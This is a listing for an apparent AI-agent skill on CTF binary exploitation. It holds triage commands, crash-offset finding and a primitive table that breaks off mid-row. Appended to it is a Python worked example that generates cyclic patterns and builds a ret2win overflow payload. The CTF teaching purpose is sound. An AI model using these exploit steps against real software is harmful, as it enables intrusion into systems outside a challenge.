
ctf-pwn · listed

Use when solving binary exploitation / pwn CTF challenges — buffer overflows, ROP, format strings, heap, kernel pwn. Provides a decision tree, exploit primitive catalog, and uses pwntools via the run_script(venv="pwntools") MCP path. Triggers on "ctf pwn", "binary exploit", "rop", "buffer overflow", "format string", "heap challenge".
26zl/cybersec-toolkit · ★ 6 · AI & Automation · score 73
Install: claude install-skill 26zl/cybersec-toolkit
# CTF pwn methodology

## 0. Pwntools venv

The MCP server runs pwntools through a dedicated venv at `~/.ctf-venvs/pwntools/`. If it is missing, create it:

```bash
wsl.exe bash -lc "mkdir -p ~/.ctf-venvs && python3 -m venv ~/.ctf-venvs/pwntools && ~/.ctf-venvs/pwntools/bin/pip install pwntools z3-solver"
```

Then use it: `run_script(code, venv="pwntools")`.

## 1. Identify the binary

```bash
file ./vuln
checksec --file=./vuln        # or: rabin2 -I ./vuln
strings ./vuln | head -50
nm ./vuln | head -30          # symbols, if not stripped
```

Note `RELRO`, `Canary`, `NX`, `PIE`, the arch (x86 / x86_64 / arm / mips) and the libc version. If a libc is provided, identify it:

```bash
strings libc.so.6 | grep "GNU C Library"
# or: ./vuln_pwntools_helper   # see below
```

`libc-database` (local) or libc.rip (web) identify an unknown libc from leaked function addresses: the low 12 bits of a leaked address survive ASLR, so two or three leaked symbols usually pin down the build, and the database then gives the offsets of `system`, `/bin/sh` and friends.

## 2. Find the bug

Static:

- `objdump -d -M intel ./vuln`
- Ghidra / `cutter` (radare2 GUI) for decompilation; both are in the registry
- Look for: `gets`, `strcpy`, unbounded `read`, `printf(user_input)`, integer overflow on a size, double free, UAF

Dynamic:

- `gdb-multiarch ./vuln` + `pwndbg` / `gef`
- Cyclic pattern: `cyclic 200` → run → crash → `cyclic -l <RIP>` to get the offset. On i386 the pattern lands in EIP directly. On x86_64 a non-canonical return address faults inside `ret` before it is loaded, so RIP still points at the `ret` and the pattern bytes are the qword at `$rsp` (`x/gx $rsp`); feed that value to `cyclic -l` instead.

## 3. Pick the primitive

| Class | Primitive | Tool |
| --- | --- | --- |
| Stack BOF, no canary, NX off | shellcode | `pwntools shellcraft.sh()` |
| Stack BOF, NX on, no PIE or ASLR off | ret2win / static ROP | `ROPgadget --binary ./vuln` |
| Stack BOF, NX+ASLR, libc leak | ret2libc | l
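The offset-finding step in section 2 and the ret2win payload from section 3, worked through as an added example that is not part of the skill's own files and needs no pwntools install: a pure-Python de Bruijn generator equivalent to `cyclic` / `cyclic -l`, the x86_64 fallback to the qword at `$rsp`, and the payload layout. The function names (`cyclic_find`, `offset_from_crash`, `build_ret2win`) and the sample register values (`0x401190`, `0x401136`, the `$rsp` qword) are my own constructed inputs, not output from any real challenge binary.

```python
"""De Bruijn cyclic pattern + offset lookup, pure Python (no pwntools needed)."""
import struct
from itertools import islice
from typing import Iterator, Optional, Union

ALPHABET = "abcdefghijklmnopqrstuvwxyz"   # same alphabet and order pwntools uses


def de_bruijn(alphabet: str = ALPHABET, n: int = 4) -> Iterator[str]:
    """Yield the de Bruijn sequence B(k, n): every length-n string over the
    alphabet occurs exactly once, so any n bytes of the pattern identify one
    offset. FKM algorithm (concatenation of Lyndon words in lexical order)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int) -> Iterator[str]:
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """Equivalent of `cyclic <length>`: the first `length` bytes of the pattern."""
    return "".join(islice(de_bruijn(n=n), length)).encode()


def cyclic_find(subseq: Union[bytes, str, int], n: int = 4) -> int:
    """Equivalent of `cyclic -l`: offset of `subseq` in the pattern, or -1.
    An int is treated as a little-endian register value; the first n bytes of
    its 8-byte encoding are the pattern bytes that overwrote the register."""
    if isinstance(subseq, int):
        subseq = subseq.to_bytes(8, "little")
    elif isinstance(subseq, str):
        subseq = subseq.encode()
    subseq = subseq[:n]
    if len(subseq) != n:
        raise ValueError(f"need at least {n} bytes to search for")
    window = b""
    for i, ch in enumerate(de_bruijn(n=n)):
        window = (window + ch.encode())[-n:]   # last n bytes seen, ending at i
        if window == subseq:
            return i - n + 1                   # index where the match starts
    return -1


def is_canonical(addr: int) -> bool:
    """x86_64 addresses must sign-extend bit 47. Pattern bytes such as
    0x6161616c6161616b are not canonical, so `ret` faults before RIP is loaded."""
    return (addr >> 47) in (0, 0x1FFFF)


def offset_from_crash(rip: int, rsp_qword: Optional[int] = None) -> int:
    """i386: EIP holds pattern bytes, search it directly.
    x86_64: RIP still points at the faulting `ret`, so the overwrite is the
    qword sitting at [rsp] (what `x/gx $rsp` prints in gdb); search that."""
    off = cyclic_find(rip)
    if off == -1 and rsp_qword is not None:
        off = cyclic_find(rsp_qword)
    return off


def p64(addr: int) -> bytes:
    """Little-endian 8-byte pack, like pwntools p64."""
    return struct.pack("<Q", addr)


def build_ret2win(offset: int, win_addr: int) -> bytes:
    """Section-3 ret2win payload: pad up to the saved return address, then the
    address of the win function (needs no canary; NX does not matter because
    execution returns into code that already exists in the binary)."""
    return b"A" * offset + p64(win_addr)


if __name__ == "__main__":
    # Constructed sample crash state (not taken from a real binary): gdb
    # stopped on `ret` at 0x401190 with the pattern's bytes sitting at $rsp.
    RIP = 0x401190
    RSP_QWORD = 0x6161616C6161616B          # b"kaaalaaa" read little-endian
    off = offset_from_crash(RIP, RSP_QWORD)
    print(cyclic(200).decode())
    print("RIP canonical:", is_canonical(RIP), "RSP qword canonical:", is_canonical(RSP_QWORD))
    print("offset to saved RIP:", off)
    print("payload:", build_ret2win(off, 0x401136).hex())
```

Against a real target, replace the constructed register values with what gdb shows at the crash (`p/x $eip` on i386, `x/gx $rsp` on x86_64); if the lookup returns -1, the register was not overwritten with pattern bytes and the crash is somewhere other than the return address.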